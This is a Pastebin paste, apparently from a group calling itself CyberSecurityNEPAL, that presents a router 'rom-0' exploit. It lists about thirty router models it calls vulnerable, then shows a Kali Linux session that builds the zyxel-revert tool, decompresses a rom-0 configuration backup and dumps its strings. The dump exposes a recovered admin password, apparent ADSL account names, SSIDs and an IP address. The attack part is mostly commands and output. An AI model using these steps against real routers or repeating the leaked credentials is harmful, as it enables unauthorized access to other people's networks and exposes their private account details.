API tools faq
paste
Advertisement
CyberSecurityNEPAL

vulnerability router decode rom-0

CyberSecurityNEPAL
Sep 5th, 2017
1,493
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.75 KB | None | 0 0
raw download clone embed print report
  1. ______ _ _ _ _ _____ _ _ _
  2. | ____| | | (_) | | | / ____| | | (_) |
  3. | |__ __ ___ __ | | ___ _| |_ | |__ _ _ | | _ _| |__ ___ _ __ ___ ___ ___ _ _ _ __ _| |_ _ _
  4. | __| \ \/ / '_ \| |/ _ \| | __| | '_ \| | | | | | | | | | '_ \ / _ \ '__/ __|/ _ \/ __| | | | '__| | __| | | |
  5. | |____ > <| |_) | | (_) | | |_ | |_) | |_| | | |___| |_| | |_) | __/ | \__ \ __/ (__| |_| | | | | |_| |_| |
  6. |______/_/\_\ .__/|_|\___/|_|\__| |_.__/ \__, | \_____\__, |_.__/ \___|_| |___/\___|\___|\__,_|_| |_|\__|\__, |
  7. | | __/ | __/ | __/ |
  8. |_| |___/ |___/ |___/
  9. -----------------------------------------------------------------------------------------------------------------------------+
  10. # vulnerability router easy decode rom-0 file with online and kali linux os the list vulnerability router name here!
  11.  
  12. # FOR MORE INFORMATION AND COMMENTS PLEASE CONTACT ME: newfeedback@hotmail.com
  13.  
  14. # WHITE HAT (#CYBERSECURITYNEPAL) ☄ ♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚♚
  15. -----------------------------------------------------------------------------------------------------------------------------+
  16. ★★★★★★★★★★★ This type of router mode #Vulnerable ★★★★★★★★★★★★★★
  17. -----------------------------------------------------------------------------------------------------------------------------+
  18. TP-LINK TL-WR841N
  19. PRN3001
  20. D-Link DIR-615, hardware: E4, firmware: 5.10
  21. PRN2001
  22. TP-LINK TL-WR740N
  23. Huawei Technologies HG8346R
  24. DrayTek Vigor2910
  25. Tenda 11N Wireless Router
  26. DD-WRT (name: Lumbini net, model: Buffalo WHR-G125)
  27. TP-LINK TL-WR841N
  28. Netis WF2533 Router
  29. TP-LINK TL-WR340G
  30. D-Link DIR-300, hardware: rev A1, firmware: 1.04-tomi-1.1.2
  31. Airocon DG-HR3400
  32. Micro DSL (TD-W8960N V7 0x00000000 | 1.0.5 Build 160118 Rel.59896)
  33. Micro DSL (TD-W8960N V7 0x00000000 | 1.0.5 Build 160118 Rel.59896)
  34. AirGrid M5 HP (Ubiquiti AirOS v5.5.6)
  35. Netis WF2419 Router
  36. TRENDnet TEW-731BR
  37. Huawei Technologies HG8546M
  38. ZTE ZXHN E5501, firmware: V1.0.0T8_Am
  39. TP-LINK TL-WR841N
  40. DrayTek Vigor2910V
  41. TP-LINK TL-WR740N
  42. Airocon Wireless Router
  43. NETGEAR WGR614v10
  44. ZyNOS ADSL (TD-W8901G)
  45. Airocon Netis Wireless Router, firmware: RTK V2.1.1
  46. D-Link DSL-2600U
  47. Easy bypass and exploit may router this tye of model
  48. --------------------------------------------------------------------------------------------------------------------------------+
  49. ☀☀☀☀☀☀☀☀☀☀☀☀☀☀☀ EXPLOIT KALI LINUX OS / ROM-0 DECOCDE ☀☀☀☀☀☀☀☀☀☀☀☀☀☀☀
  50. --------------------------------------------------------------------------------------------------------------------------------+
  51. remote: Counting objects: 8, done.
  52. remote: Compressing objects: 100% (5/5), done.
  53. remote: Total 8 (delta 1), reused 8 (delta 1), pack-reused 0
  54. Unpacking objects: 100% (8/8), done.
  55.  
  56. root@kali:~/Desktop# ls ⌫
  57. tplink
  58. root@kali:~/Desktop# cd tplink ⌫
  59. root@kali:~/Desktop/tplink# ls ⌫
  60. zyxel-revert-779bfd5.tar.gz
  61. root@kali:~/Desktop/tplink# tar -xzf zyxel-revert-779bfd5.tar.gz
  62. root@kali:~/Desktop/tplink# ls ⌫
  63. zyxel-revert-779bfd5 zyxel-revert-779bfd5.tar.gz
  64. root@kali:~/Desktop/tplink# cd zyxel-revert-779bfd5
  65. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# ls ⌫
  66. cfgpatch.c context.h filedata.h logging.h Makefile statemachine.c
  67. compress.c decompress.c linebuffer.c lzsc.c romfile.c statemachine.h
  68. configdata.c event.c linebuffer.h lzsc.h romfile.h xmodem.c
  69. configdata.h event.h list.h lzsd.c serial.c xmodem.h
  70. context.c filedata.c logging.c lzsd.h serial.h zyxel-revert.c
  71.  
  72. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# clear ⌫
  73.  
  74. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# make -f Makefile ⌫
  75. cc -O2 -pipe -Wall -MM -c compress.c -o compress.d
  76. cc -O2 -pipe -Wall -MM -c configdata.c -o configdata.d
  77. cc -O2 -pipe -Wall -MM -c cfgpatch.c -o cfgpatch.d
  78. cc -O2 -pipe -Wall -MM -c linebuffer.c -o linebuffer.d
  79. cc -O2 -pipe -Wall -MM -c romfile.c -o romfile.d
  80. cc -O2 -pipe -Wall -MM -c serial.c -o serial.d
  81. cc -O2 -pipe -Wall -MM -c statemachine.c -o statemachine.d
  82. cc -O2 -pipe -Wall -MM -c event.c -o event.d
  83. cc -O2 -pipe -Wall -MM -c context.c -o context.d
  84. cc -O2 -pipe -Wall -MM -c decompress.c -o decompress.d
  85. cc -O2 -pipe -Wall -MM -c lzsc.c -o lzsc.d
  86. cc -O2 -pipe -Wall -MM -c xmodem.c -o xmodem.d
  87. cc -O2 -pipe -Wall -MM -c lzsd.c -o lzsd.d
  88. cc -O2 -pipe -Wall -MM -c filedata.c -o filedata.d
  89. cc -O2 -pipe -Wall -MM -c logging.c -o logging.d
  90. cc -O2 -pipe -Wall -MM -c zyxel-revert.c -o zyxel-revert.d
  91. cc -O2 -pipe -Wall -c event.c -o event.o
  92. cc -O2 -pipe -Wall -c filedata.c -o filedata.o
  93. cc -O2 -pipe -Wall -c linebuffer.c -o linebuffer.o
  94. cc -O2 -pipe -Wall -c logging.c -o logging.o
  95. cc -O2 -pipe -Wall -c context.c -o context.o
  96. cc -O2 -pipe -Wall -c serial.c -o serial.o
  97. cc -O2 -pipe -Wall -c statemachine.c -o statemachine.o
  98. cc -O2 -pipe -Wall -c xmodem.c -o xmodem.o
  99. cc -O2 -pipe -Wall -c zyxel-revert.c -o zyxel-revert.o
  100. cc -O2 -pipe -Wall event.o filedata.o linebuffer.o logging.o context.o serial.o statemachine.o xmodem.o zyxel-revert.o -o zyxel-revert
  101. cc -O2 -pipe -Wall -c lzsc.c -o lzsc.o
  102. cc -O2 -pipe -Wall -c romfile.c -o romfile.o
  103. cc -O2 -pipe -Wall -c compress.c -o compress.o
  104. cc -O2 -pipe -Wall filedata.o lzsc.o romfile.o compress.o -o compress
  105. cc -O2 -pipe -Wall -c lzsd.c -o lzsd.o
  106. lzsd.c: In function ‘lzs_unpack’:
  107. lzsd.c:103:14: warning: unused variable ‘tmp’ [-Wunused-variable]
  108. uint32_t tmp = get_bits(&state, cnt);
  109. ^~~
  110. cc -O2 -pipe -Wall -c decompress.c -o decompress.o
  111. cc -O2 -pipe -Wall filedata.o lzsd.o romfile.o decompress.o -o decompress
  112. cc -O2 -pipe -Wall -c configdata.c -o configdata.o
  113. cc -O2 -pipe -Wall -c cfgpatch.c -o cfgpatch.o
  114. cc -O2 -pipe -Wall configdata.o filedata.o cfgpatch.o -o cfgpatch
  115. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# ls
  116. cfgpatch context.h linebuffer.c lzsd.d statemachine.h
  117. cfgpatch.c context.o linebuffer.d lzsd.h statemachine.o
  118. cfgpatch.d decompress linebuffer.h lzsd.o xmodem.c
  119. cfgpatch.o decompress.c linebuffer.o Makefile xmodem.d
  120. compress decompress.d list.h romfile.c xmodem.h
  121. compress.c decompress.o logging.c romfile.d xmodem.o
  122. compress.d event.c logging.d romfile.h zyxel-revert
  123. compress.o event.d logging.h romfile.o zyxel-revert.c
  124. configdata.c event.h logging.o serial.c zyxel-revert.d
  125. configdata.d event.o lzsc.c serial.d zyxel-revert.o
  126. configdata.h filedata.c lzsc.d serial.h
  127. configdata.o filedata.d lzsc.h serial.o
  128. context.c filedata.h lzsc.o statemachine.c
  129. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# ./decompress /root/Desktop/rom-0 ⌫
  130. header of previous block is=0x080000f2 expected=0x080000f2 OK
  131. header of previous block is=0x08000048 expected=0x08000048 OK
  132. header of previous block is=0x080000e0 expected=0x080000e0 OK
  133. header of previous block is=0x08000082 expected=0x08000082 OK
  134. header of previous block is=0x08000060 expected=0x08000060 OK
  135. header of previous block is=0x08000080 expected=0x08000080 OK
  136. header of previous block is=0x0800006b expected=0x0800006b OK
  137. header of previous block is=0x08000075 expected=0x08000075 OK
  138. header of previous block is=0x080000b7 expected=0x080000b7 OK
  139. header of previous block is=0x0800009d expected=0x0800009d OK
  140. header of previous block is=0x08000068 expected=0x08000068 OK
  141. header of previous block is=0x08000079 expected=0x08000079 OK
  142. header of previous block is=0x0800004c expected=0x0800004c OK
  143. header of previous block is=0x0800004d expected=0x0800004d OK
  144. header of previous block is=0x0800004b expected=0x0800004b OK
  145. header of previous block is=0x0800004d expected=0x0800004d OK
  146. header of previous block is=0x0800004e expected=0x0800004e OK
  147. header of previous block is=0x08000049 expected=0x08000049 OK
  148. header of previous block is=0x0800004e expected=0x0800004e OK
  149. header of previous block is=0x0800004c expected=0x0800004c OK
  150. header of previous block is=0x0800004b expected=0x0800004b OK
  151. header of previous block is=0x0800004e expected=0x0800004e OK
  152. header of previous block is=0x0800004c expected=0x0800004c OK
  153. header of previous block is=0x0800004b expected=0x0800004b OK
  154. header of previous block is=0x0800004f expected=0x0800004f OK
  155. header of previous block is=0x08000054 expected=0x08000054 OK
  156. header of previous block is=0x08000048 expected=0x08000048 OK
  157. header of previous block is=0x080000af expected=0x080000af OK
  158. header of previous block is=0x08000063 expected=0x08000063 OK
  159. header of previous block is=0x0800004e expected=0x0800004e OK
  160. header of previous block is=0x0800009c expected=0x0800009c OK
  161. header of previous block is=0x0800013c expected=0x0800013c OK
  162. header of previous block is=0x08000083 expected=0x08000083 OK
  163. header of previous block is=0x08000065 expected=0x08000065 OK
  164. header of previous block is=0x0800008a expected=0x0800008a OK
  165. header of previous block is=0x08000048 expected=0x08000048 OK
  166. header of previous block is=0x0800004f expected=0x0800004f OK
  167. header of previous block is=0x080000aa expected=0x080000aa OK
  168. header of previous block is=0x08000077 expected=0x08000077 OK
  169. header of previous block is=0x08000095 expected=0x08000095 OK
  170. header of previous block is=0x08000054 expected=0x08000054 OK
  171. header of previous block is=0x08000048 expected=0x08000048 OK
  172. header of previous block is=0x08000048 expected=0x08000048 OK
  173. header of previous block is=0x08000051 expected=0x08000051 OK
  174. header of previous block is=0x08000048 expected=0x08000048 OK
  175. header of previous block is=0x0800005b expected=0x0800005b OK
  176. header of previous block is=0x0800006f expected=0x0800006f OK
  177. header of previous block is=0x08000057 expected=0x08000057 OK
  178. header of previous block is=0x08000063 expected=0x08000063 OK
  179. header of previous block is=0x0800008a expected=0x0800008a OK
  180. header of previous block is=0x0800004f expected=0x0800004f OK
  181. header of previous block is=0x08000052 expected=0x08000052 OK
  182. header of previous block is=0x00ee000f expected=0x00ee000f OK
  183. lzs_unpack: decompressed 5908 (5908) bytes to 106734 (65536) bytes
  184. *** Error in `./decompress': double free or corruption (!prev): 0x807c1028 ***
  185. ======= Backtrace: =========
  186. /lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb757537a]
  187. /lib/i386-linux-gnu/libc.so.6(+0x6dfb7)[0xb757bfb7]
  188. /lib/i386-linux-gnu/libc.so.6(+0x6e776)[0xb757c776]
  189. ./decompress(main+0xca)[0x800fa6da]
  190. /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7526276]
  191. ./decompress(+0x724)[0x800fa724]
  192. ======= Memory map: ========
  193. 800fa000-800fc000 r-xp 00000000 08:01 990608 /root/Desktop/tplink/zyxel-revert-779bfd5/decompress
  194. 800fc000-800fd000 r--p 00001000 08:01 990608 /root/Desktop/tplink/zyxel-revert-779bfd5/decompress
  195. 800fd000-800fe000 rw-p 00002000 08:01 990608 /root/Desktop/tplink/zyxel-revert-779bfd5/decompress
  196. 807bd000-807de000 rw-p 00000000 00:00 0 [heap]
  197. b73e2000-b73fe000 r-xp 00000000 08:01 263589 /lib/i386-linux-gnu/libgcc_s.so.1
  198. b73fe000-b73ff000 r--p 0001b000 08:01 263589 /lib/i386-linux-gnu/libgcc_s.so.1
  199. b73ff000-b7400000 rw-p 0001c000 08:01 263589 /lib/i386-linux-gnu/libgcc_s.so.1
  200. b7400000-b7421000 rw-p 00000000 00:00 0
  201. b7421000-b7500000 ---p 00000000 00:00 0
  202. b750e000-b76bf000 r-xp 00000000 08:01 263552 /lib/i386-linux-gnu/libc-2.24.so
  203. b76bf000-b76c1000 r--p 001b0000 08:01 263552 /lib/i386-linux-gnu/libc-2.24.so
  204. b76c1000-b76c2000 rw-p 001b2000 08:01 263552 /lib/i386-linux-gnu/libc-2.24.so
  205. b76c2000-b76c5000 rw-p 00000000 00:00 0
  206. b76e5000-b76e8000 rw-p 00000000 00:00 0
  207. b76e8000-b76ea000 r--p 00000000 00:00 0 [vvar]
  208. b76ea000-b76ec000 r-xp 00000000 00:00 0 [vdso]
  209. b76ec000-b770e000 r-xp 00000000 08:01 263524 /lib/i386-linux-gnu/ld-2.24.so
  210. b770e000-b770f000 rw-p 00000000 00:00 0
  211. b770f000-b7710000 r--p 00022000 08:01 263524 /lib/i386-linux-gnu/ld-2.24.so
  212. b7710000-b7711000 rw-p 00023000 08:01 263524 /lib/i386-linux-gnu/ld-2.24.so
  213. bfa45000-bfa66000 rw-p 00000000 00:00 0 [stack]
  214. Aborted
  215. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5# strings /root/Desktop/rom-0.decomp ⌫⌫⌫⌫
  216. -----------------------------------------------------------------------------------
  217. decode the rom-0 file
  218. cas123 ------(PASSWORD FOUND) ☹☹☹☹☹☹☹☹☹☹☹☹
  219. TP-LINK
  220. public
  221. public
  222. public
  223. P8mC
  224. 24.56.178.140
  225. http://srrys.pw/2;clm
  226. d 777 2;./2`
  227. 2;./2`
  228. 2`Node1
  229. adsl35420797
  230. adsl35420797
  231. Node2
  232. Node3
  233. Node4
  234. Node5
  235. Node6
  236. Node7
  237. Node8
  238. adsl35420797
  239. adsl35420797
  240. uTorrent (TCP)
  241. uTorrent (UDP)
  242. dhcppc
  243. 0CAS XXXXXXX OOOOOO
  244. d + *
  245. Fe`.
  246. 12345678
  247. 123cas
  248. TP-LINK_012345
  249. d + *
  250. lzs_unpack: decompressed 5908 (5908) bytes to 106734 (65536) bytes
  251. TP-LINK_012346
  252. d + *
  253. TP-LINK_012347
  254. d + *
  255. default
  256. vlan15
  257. {/tr069
  258. TP-LINK
  259. TD-W8951ND
  260. DSL-Gateway
  261. TP-LINK Product
  262. TD-W8951ND V5
  263. 001D0F
  264. 0001-01-01T00:00:00Z
  265. YRT5390_1
  266. Trendchip 11BGN AP
  267. @user
  268. password
  269. QrUoz
  270. root@kali:~/Desktop/tplink/zyxel-revert-779bfd5#
  271. ---------------------------------------------------------------------------------------------------------------------------------------
  272. ❄❄❄❄❄❄❄❄❄❄❄ EXPLOIT BY #CyberSecurityNepal ❄❄❄❄❄❄❄❄❄❄❄
  273. ---------------------------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!